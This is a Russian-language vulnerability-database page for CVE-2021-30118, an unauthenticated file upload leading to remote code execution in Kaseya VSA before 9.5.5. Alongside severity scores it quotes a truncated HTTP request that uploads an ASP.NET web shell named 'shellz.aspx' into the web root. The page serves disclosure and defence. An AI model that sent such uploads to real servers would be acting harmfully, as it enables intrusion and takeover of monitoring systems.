Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

nvd логотип

CVE-2021-30118

Опубликовано: 09 июл. 2021
Источник: nvd
CVSS3: 9.8
CVSS2: 10
EPSS Средний

Описание

An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="

Уязвимые конфигурации

Конфигурация 1
cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*
Версия до 9.5.5 (исключая)

EPSS

Процентиль: 98%
0.63086
Средний

9.8 Critical

CVSS3

10 Critical

CVSS2

Дефекты

CWE-434

Связанные уязвимости

CVSS3: 9.8
github
больше 3 лет назад

Kaseya VSA before 9.5.5 allows remote code execution.

EPSS

Процентиль: 98%
0.63086
Средний

9.8 Critical

CVSS3

10 Critical

CVSS2

Дефекты

CWE-434